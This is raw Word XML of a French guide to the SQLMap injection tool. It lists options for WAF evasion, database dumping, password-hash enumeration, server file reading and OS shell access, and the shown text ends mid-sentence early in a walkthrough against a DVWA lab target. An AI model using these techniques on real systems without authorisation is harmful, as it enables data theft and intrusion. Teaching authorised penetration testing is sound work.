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3DFCC11E" w:rsidR="001254EC" w:rsidRPr="00DA4FD5" w:rsidRDefault="00134DEE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d’utilisation</w:t>
      </w:r>
      <w:r w:rsidR="005F654F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B844D8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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1ADC2689" w14:textId="77777777" w:rsidR="00C962DB" w:rsidRDefault="00A41418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bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00C962DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C962DB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C962DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Objet du document</w:t>
      </w:r>
      <w:r w:rsidR="00C962DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C962DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C962DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc303426679 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00C962DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00C962DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C962DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C962DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF27E5" w14:textId="77777777" w:rsidR="00C962DB" w:rsidRDefault="00C962DB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SQLMap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6A32AA" w14:textId="77777777" w:rsidR="00C962DB" w:rsidRDefault="00C962DB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267F9F" w14:textId="77777777" w:rsidR="00C962DB" w:rsidRDefault="00C962DB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FAC4C4" w14:textId="77777777" w:rsidR="00C962DB" w:rsidRDefault="00C962DB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Injection SQL avec requête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5B4A0E" w14:textId="77777777" w:rsidR="00C962DB" w:rsidRDefault="00C962DB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Injection SQL avec requête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_Toc303426684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1" w:name="_Toc303426679"/>
      <w:r w:rsidRPr="00D2512D">
        <w:lastRenderedPageBreak/>
        <w:t>Objet du document</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5820E35D" w14:textId="77777777" w:rsidR="004F36DE" w:rsidRPr="004F36DE" w:rsidRDefault="004F36DE" w:rsidP="004F36DE"/>
    <w:p w14:paraId="7DF6442E" w14:textId="46E43770" w:rsidR="005F654F" w:rsidRDefault="005F654F" w:rsidP="005F654F">
      <w:r w:rsidRPr="005F654F">
        <w:t xml:space="preserve">Ce document présente la procédure d’utilisation de l’outil </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B844D8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654F3B6A" w14:textId="5B7F576A" w:rsidR="005F654F" w:rsidRDefault="00150E9E" w:rsidP="005F654F">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc303426680"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62D54A8C" w14:textId="2B99C2EA" w:rsidR="002B56C4" w:rsidRDefault="002B56C4" w:rsidP="002B56C4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc303426681"/>
      <w:r>
        <w:t>Man</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="00BF4A5E" w14:textId="77777777" w:rsidR="004F36DE" w:rsidRPr="004F36DE" w:rsidRDefault="004F36DE" w:rsidP="004F36DE"/>
    <w:p w14:paraId="2C68818F" w14:textId="4C8B0392" w:rsidR="009D569B" w:rsidRDefault="009D569B" w:rsidP="009D569B">
      <w:r>
        <w:t xml:space="preserve">Pour avoir une liste des options disponibles avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, taper la commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D569B">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D569B">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D569B">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D569B">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D569B">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>hh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour avoir un manuel plus détaillé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C14CF42" w14:textId="155FDAF1" w:rsidR="009D569B" w:rsidRDefault="009D569B" w:rsidP="009D569B">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc303426682"/>
      <w:r>
        <w:t>Utilisation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3AA66C1C" w14:textId="77777777" w:rsidR="000672DC" w:rsidRPr="000672DC" w:rsidRDefault="000672DC" w:rsidP="000672DC"/>
    <w:p w14:paraId="6AD4D76A" w14:textId="77777777" w:rsidR="00B54670" w:rsidRDefault="00B54670" w:rsidP="00B54670">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le squelette de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est :</w:t>
      </w:r>
      <w:r w:rsidRPr="0063576D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8A9690" w14:textId="77777777" w:rsidR="00B54670" w:rsidRDefault="00B54670" w:rsidP="00B54670"/>
    <w:p w14:paraId="788FE8C1" w14:textId="06BDCADD" w:rsidR="00B54670" w:rsidRDefault="00B54670" w:rsidP="00B54670">
      <w:r>
        <w:t xml:space="preserve">Quelques options utiles et nécessaires à l’utilisation de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D94957" w14:textId="3DDC7B0D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-u</w:t>
      </w:r>
      <w:r>
        <w:t> : définit l’URL cible (</w:t>
      </w:r>
      <w:r w:rsidR="00D335DB">
        <w:t xml:space="preserve">par exemple : </w:t>
      </w:r>
      <w:r w:rsidR="00D74E90" w:rsidRPr="00D74E90">
        <w:t>www.victim.tld/vuln/id=1</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D74E90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722E5351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--cookie</w:t>
      </w:r>
      <w:r>
        <w:t> : définit le cookie pour effectuer l’authentification auprès d’une application web ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D5AD89" w14:textId="0412B350" w:rsidR="003136DE" w:rsidRPr="0002454C" w:rsidRDefault="003136DE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3136DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : spécifie le(s) paramètre(s) à tester ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54368CA5" w14:textId="77777777" w:rsidR="0002454C" w:rsidRDefault="0002454C" w:rsidP="0002454C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--data</w:t>
      </w:r>
      <w:r w:rsidRPr="007077BC">
        <w:t> :</w:t>
      </w:r>
      <w:r>
        <w:t> utile lors de requêtes POST ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE6A9C" w14:textId="77777777" w:rsidR="0002454C" w:rsidRDefault="0002454C" w:rsidP="0002454C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tamper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> : scripts utiles pour l’évasion de WAF ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630CC640" w14:textId="12859B5B" w:rsidR="0002454C" w:rsidRDefault="0002454C" w:rsidP="0002454C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6D3BDC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>--technique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00235787">
        <w:t>spécifie</w:t>
      </w:r>
      <w:r w:rsidR="00663BF8" w:rsidRPr="00663BF8">
        <w:t xml:space="preserve"> l</w:t>
      </w:r>
      <w:r w:rsidR="00663BF8">
        <w:t xml:space="preserve">a ou les technique(s) à utiliser (par défaut BEUST qui correspond à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00663BF8" w:rsidRPr="00663BF8">
        <w:t>Boolean-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00663BF8" w:rsidRPr="00663BF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00663BF8" w:rsidRPr="00663BF8">
        <w:t>blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00663BF8" w:rsidRPr="00663BF8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00663BF8" w:rsidRPr="00663BF8">
        <w:t>Error-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00663BF8">
        <w:t xml:space="preserve">, UNION </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00663BF8">
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00663BF8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00663BF8">
        <w:t>Stacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00663BF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00663BF8">
        <w:t>queries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00663BF8">
        <w:t xml:space="preserve"> et Time-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00663BF8">
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00663BF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00663BF8">
        <w:t>blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00663BF8">
        <w:t>) ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1E6E72" w14:textId="7ED9A3F3" w:rsidR="0002454C" w:rsidRPr="006D3BDC" w:rsidRDefault="0002454C" w:rsidP="0002454C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6D3BDC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0061338D" w:rsidRPr="006D3BDC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>prefix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0061338D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB36D5">
        <w:t xml:space="preserve">: spécifie le préfixe à ajouter au </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB36D5">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB36D5">
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36800C84" w14:textId="67907617" w:rsidR="0002454C" w:rsidRPr="006D3BDC" w:rsidRDefault="0002454C" w:rsidP="0002454C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6D3BDC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0061338D" w:rsidRPr="006D3BDC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>suffix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00DB36D5">
        <w:t xml:space="preserve">spécifie le </w:t>
      </w:r>
      <w:r w:rsidR="00506A39">
        <w:t>suffixe</w:t>
      </w:r>
      <w:r w:rsidR="00DB36D5">
        <w:t xml:space="preserve"> à ajouter au </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB36D5">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB36D5">
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF9A7E" w14:textId="55EDCEA3" w:rsidR="0002454C" w:rsidRPr="0002454C" w:rsidRDefault="0002454C" w:rsidP="0002454C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>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>delay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB36D5">
        <w:t xml:space="preserve"> : spécifie le nombre de secondes entre deux requêtes ; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46516C31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dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:t>force le type de DBMS à utiliser pour les attaques (MySQL, etc.) ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69413A8C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dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005725D5">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:t>liste les BDD du DBMS ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2908F2C9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-D</w:t>
      </w:r>
      <w:r>
        <w:t> : définit la BDD à énumérer ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202726AE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--tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1508C">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:t>liste les tables de la BDD ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4213CB8B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-T </w:t>
      </w:r>
      <w:r>
        <w:t>: définit la table à énumérer ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E888F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-C</w:t>
      </w:r>
      <w:r>
        <w:t> : définit les colonnes à énumérer ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B80452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--dump </w:t>
      </w:r>
      <w:r>
        <w:t>: liste les enregistrements de la table ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC6F10" w14:textId="5EA6AD61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level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="003E7334">
        <w:t>fixe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> le niveau de test. Dans le cas où le scanner de vulnérabilités a détecté une faille d’injection SQL, mais que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="005A376C">
        <w:t>Map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A376C">
        <w:t xml:space="preserve"> ne la détecte pas, augmenter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la valeur de ce  paramètre. Les valeurs sont de 1 à 5, par </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>défaut la valeur est fixée à 1. Cou</w:t>
      </w:r>
      <w:r w:rsidR="005A376C">
        <w:t>pler</w:t>
      </w:r>
      <w:r w:rsidR="00D865BD">
        <w:t xml:space="preserve"> ce paramètre avec le paramètre</w:t>
      </w:r>
      <w:r w:rsidR="00D865BD">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D865BD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>risk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA33574" w14:textId="1459B554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risk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0013585B">
        <w:t xml:space="preserve">fixe </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le niveau de test. Dans le cas où le scanner de vulnérabilités a détecté une faille d’injection SQL, mais que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLM</w:t>
      </w:r>
      <w:r w:rsidR="005A376C">
        <w:t>ap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A376C">
        <w:t xml:space="preserve"> ne la détecte pas, augmenter </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la valeur de ce  paramètre. Les valeurs sont de 0 à 3, par défaut </w:t>
      </w:r>
      <w:r w:rsidR="005A376C">
        <w:t>la valeur est fixée à 1. Coupler</w:t>
      </w:r>
      <w:r w:rsidR="00F158F1">
        <w:t xml:space="preserve"> ce paramètre avec le paramètre</w:t>
      </w:r>
      <w:r w:rsidR="00F158F1">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29041801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is-dba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> : détecte si l’utilisateur courant du DBMS est DBA ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167FC959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current-db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>: récupère la BDD courante ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD2636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current</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-user</w:t>
      </w:r>
      <w:r>
        <w:t> : récupère l’utilisateur courant ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D5D14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users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>: énumère les utilisateurs du DBMS ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F136F32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passwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>: énumérer les hash des utilisateurs de la DBMS ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4073ED55" w14:textId="77777777" w:rsidR="00B54670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--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B54670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> l’URL et détecte les formulaires présents et recherche des vulnérabilités ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B1DCBE" w14:textId="10DB9F8A" w:rsidR="00AC774C" w:rsidRPr="006D4D89" w:rsidRDefault="00AC774C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AC774C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC774C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sql-shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00C554B4">
        <w:t>affiche une invite de commande SQL :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F9C80D" w14:textId="3CE418F8" w:rsidR="003915C3" w:rsidRPr="006227FB" w:rsidRDefault="003915C3" w:rsidP="003915C3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 w:rsidRPr="00AC774C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>file-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00C554B4">
        <w:t>lit un fichier hébergé sur le serveur de base de données ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50447B" w14:textId="7F8E9ADB" w:rsidR="006227FB" w:rsidRPr="006227FB" w:rsidRDefault="006227FB" w:rsidP="006227FB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  <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC774C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>os-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C554B4">
        <w:t xml:space="preserve"> : affiche une invite de commande système ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B72CEB9" w14:textId="469481EE" w:rsidR="00B54670" w:rsidRPr="004749CA" w:rsidRDefault="00B54670" w:rsidP="00457D4F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4670">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : active le mode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Les niveaux de verbosité, du moins au plus élevé, sont de 0 à 6. Le niveau par défaut est 1.</w:t>
      </w:r>
      <w:r w:rsidR="00586869">
        <w:t xml:space="preserve"> Le niveau utile est 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4922D694" w14:textId="08668436" w:rsidR="00B518FE" w:rsidRDefault="00A62A32" w:rsidP="00A62A32">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc303426683"/>
      <w:r w:rsidRPr="00A62A32">
        <w:lastRenderedPageBreak/>
        <w:t>Injection SQL avec requête GET</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="463DE2ED" w14:textId="4FA5F8A4" w:rsidR="00A62A32" w:rsidRPr="00A62A32" w:rsidRDefault="00A62A32" w:rsidP="00A62A32">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lors de la phase de Scan, nous avons repéré une URL vulnérable à l’injection SQL : </w:t>
      </w:r>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>www.victim.tld/dvwa/vulnerabilities/sqli/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La première étape est de vérifier que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> détecte également la vulnérabilité sur cette URL pour ensuite utiliser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> à des fins d’exploitation. Pour cela il faut reprendre, depuis W3AF, l’URL formatée : </w:t>
      </w:r>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>www.victim.tld/dvwa/vulnerabilities/sqli/?id=a&amp;Submit=Submit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B44AB">
        <w:br/>
      </w:r>
      <w:r w:rsidR="003B44AB">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Lorsque nous sommes confrontés à une application demandant une authentification, il faut récupérer le cookie de session.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Pour récupérer</w:t>
      </w:r>
      <w:r w:rsidR="00B8191E">
        <w:t xml:space="preserve"> le cookie de session, effectuer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’opération d’authentification en capturant au même moment les paquets avec </w:t>
      </w:r>
